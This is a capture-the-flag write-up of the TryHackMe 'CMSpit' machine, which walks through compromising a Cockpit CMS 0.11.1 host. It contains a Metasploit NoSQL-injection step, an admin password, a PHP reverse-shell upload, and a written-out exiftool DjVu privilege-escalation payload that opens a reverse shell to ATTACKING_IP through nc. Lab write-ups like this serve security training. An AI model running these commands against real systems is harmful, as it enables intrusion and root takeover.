CMSpit on Tryhackme.com
This is a writeup for the machine CMSpit on Tryhackme.com
First we start off with our nmap scan ‘nmap -sC -sV -vv -p- IP’
Scanned at 2021-08-04 01:10:31 EDT for 1523s
Not shown: 65533 closed ports
Reason: 65533 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f:25:f9:40:23:25:cd:29:8b:28:a9:d9:82:f5:49:e4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD7acH8krj6oVh6s+R3VYnJ/Xc8o5b43RcrRwiMPKe7V8V/SLfeVeHtE06j0PnfF5bHbNjtLP8pMq2USPivt/LcsS+8e+F5yfFFAVawOWqtd9tnrXVQhmyLZVb+wzmjKe+BaNWSnEazjIevMjD3bR8YBYKnf2BoaFKxGkJKPyleMT1GAkU+r47m2FsMa+l7p79VIYrZfss3NTlRq9k6pGsshiJnnzpWmT1KDjI90fGT6oIkALZdW/++qXi+px6+bWDMiW9NVv0eQmN9eTwsFNoWE3JDG7Aeq7hacqF7JyoMPegQwAAHI/ZD66f4zQzqQN6Ou6+sr7IMkC62rLMjKkXN
| 256 0a:f4:29:ed:55:43:19:e7:73:a7:09:79:30:a8:49:1b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEnbbSTSHNXi6AcEtMnOG+srCrE2U4lbRXkBxlQMk1damlhG+U0tmiObRCoasyBY2kvAdU/b7ZWoE0AmoYUldvk=
| 256 2f:43:ad:a3:d1:5b:64:86:33:07:5d:94:f9:dc:a4:01 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKYUS/4ObKPMEyPGlgqg6khm41SWn61X9kGbNvyBJh7e
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: C9CD46C6A2F5C65855276A03FE703735
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Authenticate Please!
|_Requested resource was /auth/login?to=/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:35
Completed NSE at 01:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1523.45 seconds
Raw packets sent: 71016 (3.125MB) | Rcvd: 67410 (2.736MB)
After we visit our host we get a login page.
If we look at the source code we can see a possible version number of 0.11.1
Now that we have a possible version number of 0.11.1 we will do a search to see if Cockpit 0.11.1 has any vulnerabilities. We found that it is vulnerable to a NoSQL injection vulnerability.
https://swarm.ptsecurity.com/rce-cockpit-cms/
There is a metasploit exploit for this so we will start with that.
https://www.rapid7.com/db/modules/exploit/multi/http/cockpit_cms_rce/
After we set our options in metasploit we can run it. I set the user as admin based on their commonly being an admin user on most websites.
After running the exploit we get information on the admin user and reset the password.
Now that we have possible credentials lets try to login with them.
We will login with admin@yourdomain.de for the user name and nZGYcvTF29 for the password
After logging in as admin.
After clicking on the logo on the top left we get a new dashboard.
Click on Assets.
Next we will upload our reverse shell.
Lets upload a PHP reverse shell. I will use this reverse shell from my attacking machine in /usr/share/webshells/php/php-reverse-shell.php. I set the port to 80 since its a port that I know is open. After you upload the shell setup a listener on port 80 with nc -nlvp 80
As you can see our file was successfully uploaded and after we click on the reverse shell we get brought to another page. After we click on the “link” logo we will get our shell.
We now have our reverse shell.
Now we navigate to the /home folder to see what users exist. We see that there is a user named stux. Lets list all the files in their home folder with ls -la and we will see a file called .dbshell. Lets cat that file to see whats in it.
Now that we have credentials lets try to SSH with those credentials.
After we login as the user stux we can check to see if the user can run sudo with sudo -l and as you can see we can run exiftool with sudo rights.
Lets research how we can possibly exploit this binary. I found a writeup on the vulnerability and a way to exploit for root access.
https://www.exploit-db.com/docs/49881
First we will create an exploit file in nano and call it exploit. We will add the reverse shell code below.
(metadata “\c${system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKING_IP 80 >/tmp/f’)};”)
After creating the exploit file we move onto the next step.
djvumake exploit.djvu INFO=0,0 BGjp=/dev/null ANTa=exploit
Setup a listener on port 80 on your attacking machine.
nc -nlvp 80
Execute the exploit.
sudo exiftool exploit.djvu
And now we are root.
root proof.
